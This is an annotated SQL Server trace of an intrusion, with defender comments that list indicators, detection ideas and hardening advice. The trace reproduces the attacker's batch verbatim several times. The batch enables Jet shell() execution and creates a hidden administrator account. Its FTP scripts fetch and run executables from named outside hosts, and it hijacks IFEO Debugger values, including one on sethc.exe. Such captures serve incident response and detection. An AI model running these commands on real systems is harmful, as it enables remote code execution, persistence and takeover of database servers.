-- The option list below looks like the session settings a SQL Server trace records for a
-- client connection (assumption: the capture tool is not identified in this text).
-- network protocol: TCP/IP
set quoted_identifier on
set implicit_transactions off
set cursor_close_on_commit off
set ansi_warnings on
set ansi_padding on
set ansi_nulls on
set concat_null_yields_null on
-- Session language is the Simplified Chinese locale. This reflects the client or login
-- default and is at most a weak attribution hint.
set language 簡體中文
set dateformat ymd
set datefirst 7
-- First non-option statement in the capture: xp_regwrite (an extended stored procedure that
-- writes to the Windows registry) sets the Jet 4.0 engine's SandBoxMode value to 1.
-- SandBoxMode governs whether Jet expressions may call functions such as Shell(); the
-- openrowset(... 'select shell(...)') statements later in this capture rely on that setting.
-- Detection: alert on any change to the Jet SandBoxMode value and on xp_regwrite calls made
-- by application or remote logins.
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1
-- One multi-statement batch, kept exactly as captured (the capture wraps it across three
-- physical lines, so the breaks fall inside string literals). In order it:
--   1. registers xp_regwrite / xp_regdeletekey from xpstar.dll and repeats the SandBoxMode write;
--   2. deletes Image File Execution Options (IFEO) entries for ftp.exe, cacls.exe and reg.exe;
--   3. runs OS commands through openrowset + the Jet shell() expression: cacls ACL changes,
--      creation of the local account "internetusers", local Administrators membership for it
--      and for guest, and two FTP download-and-run scripts;
--   4. sets IFEO "Debugger" values to ctfmon.exe for cscript.exe, reg.exe, ftp.exe, sethc.exe
--      and cacls.exe, and denies SYSTEM access to several command-line tools.
-- Indicators visible in this batch: FTP host 218.60.133.107; host 0000.0000.xxx (apparently
-- redacted); files sbboy.bat / sbboy.sys / cs.exe / cp.exe under %SystemRoot%/system32/wbem;
-- dboysb.bat / dboysb.sys; C:/dboycao.exe; Jet database path ias/dnary.mdb.
use master;dbcc addextendedproc ("xp_regwrite","xpstar.dll");dbcc addextendedproc ("xp_regdeletekey","xpstar.dll");exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1;exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe';exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe';exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe';select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 user internetusers 5651585 /add")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators internetusers /add")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators guest /ad")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>%SystemRoot%/system32/wbem/sbboy.bat&echo open 0000.0000.xxx>>%SystemRoot%/system32/wbem/sbboy.sys&echo stra>>%SystemRoot%/system32/wbem/sbboy.sys&echo 5651585>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 1.exe %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 2.exe 
%SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo bye>>%SystemRoot%/system32/wbem/sbboy.sys&echo ftp -s:%SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo ping -n 10 127.0.0.1>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.bat>>%SystemRoot%/system32/wbem/sbboy.bat&%SystemRoot%/system32/wbem/sbboy.bat")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>>dboysb.bat&echo open 218.60.133.107>dboysb.sys&echo xiaonao>>dboysb.sys&echo 469989261>>dboysb.sys&echo get 1.exe C:/dboycao.exe>>dboysb.sys&echo bye>>dboysb.sys&echo ftp -s:dboysb.sys>dboysb.bat&echo start C:/dboycao.exe>>dboysb.bat&echo ping -n 10 127.0.0.1>>dboysb.bat&echo start C:/dboycao.exe>>dboysb.bat&echo del dboysb.sys>>dboysb.bat&echo del dboysb.bat>>dboysb.bat&echo del %0>>dboysb.bat&dboysb.bat")')exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cscript.exe', 'Debugger','REG_SZ','ctfmon.exe';exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe', 'Debugger','REG_SZ','ctfmon.exe';select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls command.com /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /d 
system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cscript.exe /E /d system")')exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe', 'Debugger','REG_SZ','ctfmon.exe';exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe', 'Debugger','REG_SZ','ctfmon.exe';select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /d system")')exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe', 'Debugger','REG_SZ','ctfmon.exe';
-- Per-statement records follow; they appear to show the same activity as the preceding
-- batch, logged one statement at a time. Text is kept exactly as captured.
-- Registers the registry extended procedures from xpstar.dll. dbcc addextendedproc normally
-- requires sysadmin rights, so the login that issued it should be treated as fully compromised.
dbcc addextendedproc ("xp_regwrite","xpstar.dll")
dbcc addextendedproc ("xp_regdeletekey","xpstar.dll")
-- Deletes the Image File Execution Options (IFEO) entries for ftp.exe, cacls.exe and reg.exe,
-- presumably so an existing Debugger redirection does not block the tools used below.
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe'
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe'
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe'
-- OS commands issued through openrowset + the Jet provider's shell() expression; they run
-- with the rights of the SQL Server service account. cacls /E /G system:f edits the ACLs of
-- cmd.exe, reg.exe, ftp.exe and net1.exe to grant SYSTEM full control.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /G system:f")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /G system:f")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /G system:f")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /G system:f")'
-- Persistence: creates the local account "internetusers" and targets local Administrators
-- membership for it and for the built-in guest account (some statements are logged twice).
-- Hunt for this account name and for unexpected Administrators members on affected hosts.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 user internetusers 5651585 /add")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators internetusers /add")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators internetusers /add")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators guest /ad")'
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators guest /ad")'
-- Download-and-run stage: writes an FTP command script (sbboy.sys) and a batch file
-- (sbboy.bat) under %SystemRoot%/system32/wbem. The batch stops the sharedaccess service,
-- fetches 1.exe and 2.exe as cs.exe and cp.exe, runs them, then deletes both helper files.
-- The FTP host is shown as 0000.0000.xxx here, apparently redacted.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>%SystemRoot%/system32/wbem/sbboy.bat&echo open 0000.0000.xxx>>%SystemRoot%/system32/wbem/sbboy.sys&echo stra>>%SystemRoot%/system32/wbem/sbboy.sys&echo 5651585>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 1.exe %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 2.exe %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo bye>>%SystemRoot%/system32/wbem/sbboy.sys&echo ftp -s:%SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo ping -n 10 127.0.0.1>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.bat>>%SystemRoot%/system32/wbem/sbboy.bat&%SystemRoot%/system32/wbem/sbboy.bat")'
-- Sets the IFEO "Debugger" value for cscript.exe and reg.exe to ctfmon.exe, so starting those
-- tools launches ctfmon.exe instead. Monitor IFEO Debugger values for unexpected entries.
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cscript.exe', 'Debugger','REG_SZ','ctfmon.exe'
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe', 'Debugger','REG_SZ','ctfmon.exe'
-- The next three physical lines are a fragment of the multi-statement batch: the text starts
-- mid-statement and otherwise appears to repeat the batch captured earlier (FTP hosts
-- 0000.0000.xxx and 218.60.133.107).
("xp_regdeletekey","xpstar.dll");exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1;exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe';exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe';exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe';select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /G system:f")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 user internetusers 5651585 /add")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators internetusers /add")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators guest /ad")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>%SystemRoot%/system32/wbem/sbboy.bat&echo open 0000.0000.xxx>>%SystemRoot%/system32/wbem/sbboy.sys&echo stra>>%SystemRoot%/system32/wbem/sbboy.sys&echo 5651585>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 1.exe %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 2.exe %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo 
bye>>%SystemRoot%/system32/wbem/sbboy.sys&echo ftp -s:%SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo ping -n 10 127.0.0.1>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.bat>>%SystemRoot%/system32/wbem/sbboy.bat&%SystemRoot%/system32/wbem/sbboy.bat")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>>dboysb.bat&echo open 218.60.133.107>dboysb.sys&echo xiaonao>>dboysb.sys&echo 469989261>>dboysb.sys&echo get 1.exe C:/dboycao.exe>>dboysb.sys&echo bye>>dboysb.sys&echo ftp -s:dboysb.sys>dboysb.bat&echo start C:/dboycao.exe>>dboysb.bat&echo ping -n 10 127.0.0.1>>dboysb.bat&echo start C:/dboycao.exe>>dboysb.bat&echo del dboysb.sys>>dboysb.bat&echo del dboysb.bat>>dboysb.bat&echo del %0>>dboysb.bat&dboysb.bat")')exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cscript.exe', 'Debugger','REG_SZ','ctfmon.exe';exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe', 'Debugger','REG_SZ','ctfmon.exe';select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls command.com /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /d system")')select * from 
openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /d system")')select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cscript.exe /E /d system")')exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe', 'Debugger','REG_SZ','ctfmon.exe';exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe', 'Debugger','REG_SZ','ctfmon.exe';select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /d system")')exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe', 'Debugger','REG_SZ','ctfmon.exe';
-- A statement-per-line copy of the intrusion batch, kept exactly as captured. It differs from
-- the other copies in this capture by its FTP hosts (stra.3322.org and 61.132.118.88).
-- Hardening relevant to everything below: keep application logins out of sysadmin, leave the
-- 'Ad Hoc Distributed Queries' option disabled, run the SQL Server service under a
-- low-privileged account rather than LocalSystem, and do not expose the instance directly to
-- untrusted networks.
use master;
-- Registers the registry extended procedures from xpstar.dll. dbcc addextendedproc normally
-- requires sysadmin rights, so the login used here should be treated as fully compromised.
dbcc addextendedproc ("xp_regwrite","xpstar.dll");
dbcc addextendedproc ("xp_regdeletekey","xpstar.dll");
-- Writes the Jet 4.0 SandBoxMode value (1). SandBoxMode governs whether Jet expressions may
-- call functions such as Shell(); the openrowset statements below rely on that setting.
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1;
-- Deletes the Image File Execution Options (IFEO) entries for ftp.exe, cacls.exe and reg.exe,
-- presumably so an existing Debugger redirection does not block the tools used below.
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe';
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe';
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe';
-- OS commands issued through openrowset + the Jet provider's shell() expression; they run
-- with the rights of the SQL Server service account. cacls /E /G system:f edits the ACLs of
-- cmd.exe, reg.exe, ftp.exe and net1.exe to grant SYSTEM full control, which suggests the
-- author expects the service to run as LocalSystem.
-- Detection: child processes of the SQL Server service such as cmd.exe, cacls.exe, net1.exe
-- or ftp.exe are rarely legitimate.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /G system:f")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /G system:f")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /G system:f")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /G system:f")')
-- Persistence: creates the local account "internetusers" and targets local Administrators
-- membership for it and for the built-in guest account. Review account-creation and
-- group-membership audit events, and treat the password shown here as public.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 user internetusers 5651585 /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators internetusers /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("net1 localgroup administrators guest /ad")')
-- Download-and-run stage 1: writes an FTP command script (sbboy.sys) and a batch file
-- (sbboy.bat) under %SystemRoot%/system32/wbem. The batch stops the sharedaccess service,
-- fetches 1.exe and 2.exe from stra.3322.org as cs.exe and cp.exe, runs them, then deletes
-- both helper files. Indicators: stra.3322.org, wbem/cs.exe, wbem/cp.exe, sbboy.bat, sbboy.sys.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>%SystemRoot%/system32/wbem/sbboy.bat&echo open stra.3322.org>>%SystemRoot%/system32/wbem/sbboy.sys&echo stra>>%SystemRoot%/system32/wbem/sbboy.sys&echo 5651585>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 1.exe %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo get 2.exe %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.sys&echo bye>>%SystemRoot%/system32/wbem/sbboy.sys&echo ftp -s:%SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cs.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo ping -n 10 127.0.0.1>>%SystemRoot%/system32/wbem/sbboy.bat&echo %SystemRoot%/system32/wbem/cp.exe>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.sys>>%SystemRoot%/system32/wbem/sbboy.bat&echo del %SystemRoot%/system32/wbem/sbboy.bat>>%SystemRoot%/system32/wbem/sbboy.bat&%SystemRoot%/system32/wbem/sbboy.bat")')
-- Download-and-run stage 2: same pattern with helper files dboysb.sys / dboysb.bat in the
-- current working directory; fetches 1.exe from 61.132.118.88 to C:/dboycao.exe and starts it.
-- Indicators: 61.132.118.88, C:/dboycao.exe, dboysb.bat, dboysb.sys. Outbound FTP from a
-- database server is itself worth alerting on.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cmd.exe /c echo net1 stop sharedaccess>>dboysb.bat&echo open 61.132.118.88>dboysb.sys&echo 123>>dboysb.sys&echo 123>>dboysb.sys&echo get 1.exe C:/dboycao.exe>>dboysb.sys&echo bye>>dboysb.sys&echo ftp -s:dboysb.sys>dboysb.bat&echo start C:/dboycao.exe>>dboysb.bat&echo ping -n 10 127.0.0.1>>dboysb.bat&echo start C:/dboycao.exe>>dboysb.bat&echo del dboysb.sys>>dboysb.bat&echo del dboysb.bat>>dboysb.bat&echo del %0>>dboysb.bat&dboysb.bat")')
-- Sets the IFEO "Debugger" value for cscript.exe and reg.exe to ctfmon.exe, so starting those
-- tools launches ctfmon.exe instead; this hampers investigation and cleanup on the host.
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cscript.exe', 'Debugger','REG_SZ','ctfmon.exe';
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/reg.exe', 'Debugger','REG_SZ','ctfmon.exe';
-- cacls /E /d system adds a deny entry for SYSTEM on cmd.exe, command.com, net.exe, reg.exe,
-- ftp.exe and cscript.exe. Compare the ACLs of these files against a known-good host during
-- recovery.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cmd.exe /E /d system")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls command.com /E /d system")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net.exe /E /d system")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls reg.exe /E /d system")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls ftp.exe /E /d system")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls cscript.exe /E /d system")')
-- Same IFEO Debugger redirection for ftp.exe and sethc.exe (the Sticky Keys helper).
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/ftp.exe', 'Debugger','REG_SZ','ctfmon.exe';
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe', 'Debugger','REG_SZ','ctfmon.exe';
-- Deny entry for SYSTEM on net1.exe, then the IFEO redirection for cacls.exe itself.
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias/dnary.mdb','select shell("cacls net1.exe /E /d system")')
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cacls.exe', 'Debugger','REG_SZ','ctfmon.exe';
-- Repeat of the cscript.exe redirection, logged once more at the end of the capture.
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/cscript.exe', 'Debugger','REG_SZ','ctfmon.exe'